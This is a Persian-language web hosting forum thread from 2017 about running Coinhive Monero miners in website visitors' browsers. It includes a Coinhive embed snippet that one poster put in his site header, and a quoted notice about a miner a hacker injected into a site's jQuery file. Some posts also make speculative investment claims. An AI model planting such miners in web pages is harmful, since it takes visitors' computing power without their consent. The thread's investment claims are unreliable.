در رابطه با اینکه تعداد بازدید اون سایت چقدره، تعداد بازدید ملاک نیست! قدرت کامپیوتر کاربر های سایت ملاکه

کد رو حدود ۱ ساعت پیش در سایتم گذاشتم و نتیجش این بود (هش بین ۴۰۰ تا ۱۵۰۰)
http://uupload.ir/files/0b62_screen_shot_1396-08-15_at_22.18.47.png (http://uupload.ir/)

این استخراج بیت کوین نیست! واحد مونرو هست. Monero (XRM)

در کل درآمدش خوب نیست. با تخمینی که من زدم شاید ماهیانه نهایتا ۳۰۰ تا ۴۰۰ هزار تومان بشه مونرو استخراج کرد

اما ناگفته نمونه که اگه مونرو هم مانند بیت کوین گران بشه ارزشش رو داره. اگه هدف شما از کسب مونرو این هست که بفروشید و به پول تبدیل کنید، ارزشش رو نداره. اما اگه میخواید نگهداری کنید واسه حداقل ۳ سال، شاید سود زیادی کنید

برای مثال من قبلا حدود ۱۵ میلیون بیت کوین خریدم (درآمد خارج از کشورم رو به بیت کوین تبدیل کردم و نگه داشتم) الان دیدم ارزشش از ۱۰۰ میلیون هم بیشتر شده که خودمم باورم نشد

اگه مونرو هم مثل بیت کوین گران بشه ارزشش رو داره. چون دانشگاه MIT هم پشت این قضیه هست احساس میکنم پیشرفت خوبی داشته باشه...

این مبلغی که زده به دلار برا 1 مورو هست ؟

Raymvnd
November 10th, 2017, 16:58
این مبلغی که زده به دلار برا 1 مورو هست ؟
اره..برای مونرو هستش...الان ارزش۱۰۸ دلار هستش نسبت به دیروز ۸ دلار سقوط کرده...

Ashkankamangar.ir
November 11th, 2017, 13:17
تو آپدیت جدید خود windows Defender اجازه ی اجرا و مصرف سی پی یو رو نمیده

saeed1988m
November 11th, 2017, 17:19
اصلا جالب نیست بنده در حدود یک تست 24 ساعته در یک وب سایت با حدود 16تا18 هزار آی پی مقداری که داد برابر با 0.00307 XMR بود البته اگر کد رو اشتباه نگذاشته باشم
کد رو به شکل زیر در هدر قرار دادم در سایت :
<script>
var miner = new CoinHive.Anonymous('fsjpWrUAXtch7uwAnzCFNYsY6HOaX6 R3');
miner.start();
</script>

MJmoonwalk
November 11th, 2017, 17:26
به تعداد آی پی نیست. به مدت زمان حضور کاربر واقعی در صفحه است.

saeed1988m
November 11th, 2017, 17:31
به تعداد آی پی نیست. به مدت زمان حضور کاربر واقعی در صفحه است.

آی پی که واقعی هست و کاربر واقعی داریم در مورد زمان هم حدود 1دقیقه در سایت هستند اما فک کنم سیستم های کاربران مهمه که برا کاربرای ما فک کنم ویندوز 98 هستن با رم 128 و سی پی یو عهد کهن دی:

dertgtr
November 12th, 2017, 03:39
باسلام، mining کردن آنقدر که فکر می کنید آسان نیست! اگر آسان بود همه سیستم ها را روشن می گذاشتند و پولدار می شدند، تمامی مرورگر های شما جاوا اسکریپت را پشتیبانی می کنند، جاوا اسکریپت هم رابط OpenGL را پشتیبانی می کنند، OpenGL برای پردازش به threads های GPU دسترسی دارد که برای ساخت هش بسیار سریع است، thread های پیش فرض Coinhive دو عدد (خیلی کم) است که قابل افزایش است، اگر حداکثر را استفاده کنید باید قادر به ساخت 20 هش در دقیقه باشید، همانطور که یکی از دوستان اشاره کرد سایت های پر ترافیک مثل piratebay یا سایت های پر ترافیک پو_رن هاب، تیوب 8 و .. الان در حال استفاده هستند که فرض کنیم روزی یک میلیون بازدید کننده پو_رن هاب (خیلی بیشتر از این ارقام است) برای یک دقیقه در سایت باشند 20 میلیون هش ساخته خواهد شد. lib های جاوا اسکریپت برای استخراج بیت کوین هم نوشته شده است که با جستجوی پیدا خواهید کرد.

امکانش هست نمونه کد جاوا اسکریپت برای این کار معرفی کنید؟

hassanshaikhi
November 12th, 2017, 08:49
سایت دانلود ها هم از این روش داره استفاده میکنه:105:

1eng.ir
November 12th, 2017, 09:53
بیت کوین بخرید

$5,681.69

Pin to top کنید برای ۳۶۵ روز آینده که شد ۱۲٬۰۰۰ دلار :d

shivahost
November 12th, 2017, 12:10
بیت کوین بخرید

$5,681.69

Pin to top کنید برای ۳۶۵ روز آینده که شد ۱۲٬۰۰۰ دلار :d

جالبه که اینکار رو میشه با یک پنجم سرمایه در بروکرهای فارکس انجام داد و حالش رو برد. البته ریسک ضرر هم داره.

qaplan
November 12th, 2017, 12:15
یکی این تاپیکو ببنده یه هفتس هی تو آخرین ارسالی ها میاد!

پاسخ ها از موضوع تاپیک منحرف شدن!

saeed1988m
November 12th, 2017, 12:44
جالبه که اینکار رو میشه با یک پنجم سرمایه در بروکرهای فارکس انجام داد و حالش رو برد. البته ریسک ضرر هم داره.

اگر مقاله ای یا موردی هست که بشه اطلاعات خوبی در مورد کار در فارکس آموخت لطفا قرار بدین یا اگر توضیح اجمالی هم بدین ممنون میشیم
در مورد خرید بیت کویین هم اگر پیشنهادی داریم لطفا مارو هم در جریان بزارید
سپاس

AtrafNet
November 12th, 2017, 13:33
یکی این تاپیکو ببنده یه هفتس هی تو آخرین ارسالی ها میاد!

پاسخ ها از موضوع تاپیک منحرف شدن!
چرا ببندن تازه داره این رویه شیوع پیدا میکنه بذار باز باشه ببینیم آخر سر نتیجه اش چی میشه :d
الان متاسفانه سایت gizmiz.com که متعلق به همون مالک کانال معروف گیزمیز هستش هم ماینینگ رو شروع کرده.
از اون بدتر سایت معروف downloadha.com هم ماینینگ میکنه و این تاپیک هم علیه اش در انجمن لیون کامپیوتر ایجاد شده:
https://forum.lioncomputer.ir/index.php?/topic/81297-به-نظر-میاد-سایت-donwloadha-از-سیستم-بازدید-کنندگانش-برای-ماین-استفاده-می-کند/

1eng.ir
November 12th, 2017, 13:55
از اون بدتر سایت معروف downloadha.com هم ماینینگ میکنه و این تاپیک هم علیه اش در انجمن لیون کامپیوتر ایجاد شده:
https://forum.lioncomputer.ir/index.php?/topic/81297-به-نظر-میاد-سایت-donwloadha-از-سیستم-بازدید-کنندگانش-برای-ماین-استفاده-می-کند/

طفلک سایتشو هک کرده بودن، ورداشتتش الان ...

saeed1988m
November 12th, 2017, 14:19
طفلک سایتشو هک کرده بودن، ورداشتتش الان ...
درود بر شما
عذر میخوام این پستی که زدین در مورد خرید بیتکویین و Pin To Top یه مقدار بیشتر توضیح میدین اگر هم پل ارتباطی دارین ممنون میشم به تلگرام بنده پیامی بدین

1eng.ir
November 12th, 2017, 14:24
درود بر شما
عذر میخوام این پستی که زدین در مورد خرید بیتکویین و Pin To Top یه مقدار بیشتر توضیح میدین اگر هم پل ارتباطی دارین ممنون میشم به تلگرام بنده پیامی بدین

درود

منظور سرمایه گذاری رو بیت کوین بود که در دراز مدت رشد خوبی خواهد کرد.

پل ارتباطی که دارم، ولی کوین باز نیستم :d
m_1817 at Telegram

nevergotme
November 12th, 2017, 16:34
چرا ببندن تازه داره این رویه شیوع پیدا میکنه بذار باز باشه ببینیم آخر سر نتیجه اش چی میشه :d
الان متاسفانه سایت gizmiz.com که متعلق به همون مالک کانال معروف گیزمیز هستش هم ماینینگ رو شروع کرده.

اون افزونه که معرفی کردین ، انگار برا من دچار مشکل شده ، وارد سایت downloadha میشم ، شروع میکنه به مصرف پردازنده ، فکر کنم فقط جلوی 100% استفاده رو میگیره چون downloadha کمتره از 50% استفاده میکنه الان.

آپدیت :

اطلاعیه مهم! وجود Miner در وبسایت دانلودها به مدت ۳روز

(http://اطلاعیه مهم! وجود Miner در وبسایت دانلودها به مدت ۳روز)
با سلام خدمت تمامی کاربران محترم وبسایت دانلودها پیرو مشکل پیش آمده که از چندین روز اخیر دامنگیر وبسایت دانلودها شده بود، خوشبختانه این مهم به صورت کامل ریشه کن شده و تمامی عوامل آسیب پذیری از بین رفته و رفع اشکال شده اند. داستان از جایی شروع شد که در تاریخ ۱۰نوامبر ۲۰۱۷ اسکریپتی آلوده در فایل jquery-migrate.min.js?ver=1.4.1 توسط هکری ناشناس بر روی وبسایت دانلودها آپلود شد. به سرعت تیم پشتیبانی فنی دانلودها شروع به کار کرد و این امر را مورد توجه خود قرار داد. شکر خدا امروز در ساعت ۱۵:۰۰ روز ۲۱م آبان ماه این مشکل به طور کامل برطرف شد و اسکریپت آلوده با تمامی ریشه های آن از وبسایت دانلودها حذف شدند. این ماینر به هیچ وجه برای وبسایت دانلودها نبوده است. قطعا کاربران وبسایت دانلودها از اهمیت بسیار بالایی برای ما برخوردار می باشند و چنین امری بدون اطلاع رسانی و استفاده از منابع کاربران، حرام و نادرست می باشد. متاسفانه سیستم ماینینگ Monero که در وبسایت CoinHive می باشد قابل ردگیری نیست و به صورت کاملا غیرمتمرکز کار خود را انجام می دهد و بساط بسیار مناسبی برای هکران و باج گیرندگان شده است. عذرخواهی ما را در مشکل پیش آمده لطفا پذیرا باشید. از هم اکنون به مثال قبل با خیال راحت دانلودها را بازکرده و در آن به گشت و گذار و دانلود مشغول شوید. اگر هنوز هم CPUشما در حال Mine می باشد، لطفا از کلید ترکیبی Ctrl+F5 استفاده کنید تا Cache بر روی مرورگر شما حذف شده و سایت مجدد بارگذاری شود. با نهایت احترام مدیریت وبسایت دانلودها

فکر کنم بخاطر اینکه کش بود تو مرورگر شناسایی نمیکرد Ctrl + f5 زدم درس شد.

ولی هنوز رو سایت گیز میز هست با پاک کردن کش هم شناسایی نشد :

http://gizmiz.com/

gdfire
November 12th, 2017, 18:11
اون افزونه که معرفی کردین ، انگار برا من دچار مشکل شده ، وارد سایت downloadha میشم ، شروع میکنه به مصرف پردازنده ، فکر کنم فقط جلوی 100% استفاده رو میگیره چون downloadha کمتره از 50% استفاده میکنه الان.

آپدیت :

اطلاعیه مهم! وجود Miner در وبسایت دانلودها به مدت ۳روز

(http://اطلاعیه مهم! وجود Miner در وبسایت دانلودها به مدت ۳روز)

فکر کنم بخاطر اینکه کش بود تو مرورگر شناسایی نمیکرد Ctrl + f5 زدم درس شد.

ولی هنوز رو سایت گیز میز هست با پاک کردن کش هم شناسایی نشد :

http://gizmiz.com/
چند تا سایت خبریم دارن استفاده می کنن کلا همه گیر شده o:-)

sarwhost
November 12th, 2017, 19:40
سلام
دوستان که تجربه داره بیت کوین هم میشه به این صورت استخراج کرد یا نه ؟

shivahost
November 12th, 2017, 20:13
سلام
دوستان که تجربه داره بیت کوین هم میشه به این صورت استخراج کرد یا نه ؟

بیت کوین با سخت افزار های مخصوصش هم سخت شده با این روش ها که اصلا رویاست.

live
November 12th, 2017, 20:15
کار به جایی رسیده که همین الان تلوزیون ایران داره تو اخبار دربارش صحبت میکنه و میگن خیلی کلاهبرداری میشه تو این قضیه

mhiizadi
November 12th, 2017, 20:20
با سلام خدمت تمامی کاربران محترم وبسایت دانلودهاپیرو مشکل پیش آمده که از چندین روز اخیر دامنگیر وبسایت دانلودها شده بود، خوشبختانه این مهم به صورت کامل ریشه کن شده و تمامی عوامل آسیب پذیری از بین رفته و رفع اشکال شده اند.داستان از جایی شروع شد که در تاریخ ۱۰نوامبر ۲۰۱۷ اسکریپتی آلوده در فایل jquery-migrate.min.js?ver=1.4.1 توسط هکری ناشناس بر روی وبسایت دانلودها آپلود شد. به سرعت تیم پشتیبانی فنی دانلودها شروع به کار کرد و این امر را مورد توجه خود قرار داد. شکر خدا امروز در ساعت ۱۵:۰۰ روز ۲۱م آبان ماه این مشکل به طور کامل برطرف شد و اسکریپت آلوده با تمامی ریشه های آن از وبسایت دانلودها حذف شدند.این ماینر به هیچ وجه برای وبسایت دانلودها نبوده است. قطعا کاربران وبسایت دانلودها از اهمیت بسیار بالایی برای ما برخوردار می باشند و چنین امری بدون اطلاع رسانی و استفاده از منابع کاربران، حرام و نادرست می باشد. متاسفانه سیستم ماینینگ Monero که در وبسایت CoinHive می باشد قابل ردگیری نیست و به صورت کاملا غیرمتمرکز کار خود را انجام می دهد و بساط بسیار مناسبی برای هکران و باج گیرندگان شده است.عذرخواهی ما را در مشکل پیش آمده لطفا پذیرا باشید.از هم اکنون به مثال قبل با خیال راحت دانلودها را بازکرده و در آن به گشت و گذار و دانلود مشغول شوید.اگر هنوز هم CPUشما در حال Mine می باشد، لطفا از کلید ترکیبی Ctrl+F5 استفاده کنید تا Cache بر روی مرورگر شما حذف شده و سایت مجدد بارگذاری شود.با نهایت احتراممدیریت وبسایت دانلودها

اطلاعیه دانلود ها در این زمینه .

shivahost
November 12th, 2017, 20:35
اطلاعیه دانلود ها در این زمینه .

هک؟ هکر؟ معمولا هکر ها چنین مواردی را کد شده می گذارند! یا کار خودشان یا کارمندانشان بوده که لو رفتند یا کار هاستینگشون!

Cr0w
November 13th, 2017, 00:03
ی موردم اینجا از خودمون داریم :65: ای ناقلا

37107
37108

37109

1eng.ir
November 13th, 2017, 01:56
ی موردم اینجا از خودمون داریم :65: ای ناقلا

37107
37108

37109

طفلک خودشم گفته میذارم تو سایتم تست کنم :d

http://www.webhostingtalk.ir/showthread.php?t=193014&p=1716913&viewfull=1#post1716913

arminkit1
November 13th, 2017, 11:43
کلا این تاپیک شده اموزش راه اندازی ماینینگ 8-|
یعنی همین تاپیک %30 این قضیه رو توی سایتا بیشتر میکنه :))

dertgtr
November 14th, 2017, 04:18
دوستان روشی هست که روی کامپیوتر خودمون بدون نیاز به مرورگر به کمک این سایت ماینینگ کنیم؟

AtrafNet
November 14th, 2017, 08:43
دوستان روشی هست که روی کامپیوتر خودمون بدون نیاز به مرورگر به کمک این سایت ماینینگ کنیم؟

روی کامپیوتر خودتون نیاز به این سایت ندارید یه حساب اتریوم یا مونرو بسازید بعدش با نرم افزار Claymore به یه استخر (Pool) مجاز اون سکه متصل میشید و میذارید خودکار با نهایت قدرت سخت افزارتون ماین میکنه.

این دو تا فیلم رو ببینید برای ساخت حساب اتریوم و سپس شروع ماینینگ با نرم افزار Claymore هستش کلاً روند شروع کار 5 دقیقه ای انجام میشه:

https://www.aparat.com/v/kJDgL
https://www.aparat.com/v/uiZe1

تو این فیلم ها برای ساخت حساب اتریوم سایت https://www.myetherwallet.com و برای ماینینگ استخر ماین https://ethermine.org رو پیشنهاد داده.

من با GTX 1050 Ti و یکمی اورکلاک با Hashrate تقریباً 13Mh/s طی حدود یک ماه فقط صبح تا شب روشن بودن (یعنی شب ها خاموش میکردم) تونستم تا الان به مبلغ 0.04 اتریوم برسم که باز آنچنان خوب نیست چون تازه میشه 50 هزار تومان به پول ما (:|
چون لپ تاپ دارم صبح تا شب میزنم کامپیوتر هم ماین میکنه هم با IDM و اینترنت نامحدود مخابرات دانلود میکنه و خودمم پای لپ تاپ وبگردی میکنم شب ها هم برای اینکه صدای فن هاش زیاده خاموشش میکنم :)

برای سکه مونرو (XMR) هم به دست آوردنش آسون تره اما ارزشش نسبت به اتریوم خیلی خیلی کمتره.
من حدود دو هفته اول مونرو ماین میکردم اما بعد دو هفته تازه شده بودم 6 هزار تومان ولی اتریوم بعد دو هفته 14 هزار تومان شده بود.

اگه CPU قوی تری نسبت به GPU دارید شاید مونرو که می تونه هم CPU هم GPU رو درگیر کنه خوب باشه اما اگه GPU قدرتمند تره به نظرم اتریوم خیلی بهتره خصوصاً تو کارت های رده بالای AMD می تونید Hashrate خیلی بالاتری داشته باشید.

dellserver
November 18th, 2017, 21:40
سلام دوستان
کسی میدونه از سایت coinhive چطور باید پول برداشت کرد من رسوندمش به 0.05XMR

saeed1988m
November 18th, 2017, 21:57
سلام دوستان
مقدار حداقل پرداخت 0.5 هست

Ashkankamangar.ir
November 18th, 2017, 21:58
سلام دوستان

http://www.webhostingtalk.ir/showthread.php?t=193014&page=4&p=1717225&viewfull=1#post1717225

dellserver
November 18th, 2017, 22:12
بله بفرمائید چطور میتونم برداشت کنم ؟

- - - Updated - - -

http://www.webhostingtalk.ir/showthread.php?t=193014&page=4&p=1717225&viewfull=1#post1717225
ممنون ادرس رو کدوم قسمت باید بزنیم اصلا همچین جایی نداره اخه برا برداشت که ادرس بزنیم

nevergotme
December 9th, 2017, 23:08
به نظر میاد نسخه جدید موزیلا جلوی این کار رو میگیره :

http://uupload.ir/files/7nzd_capture.png

آپدیت : البته الان متوجه شدم خوده coinhive این کارو کرده.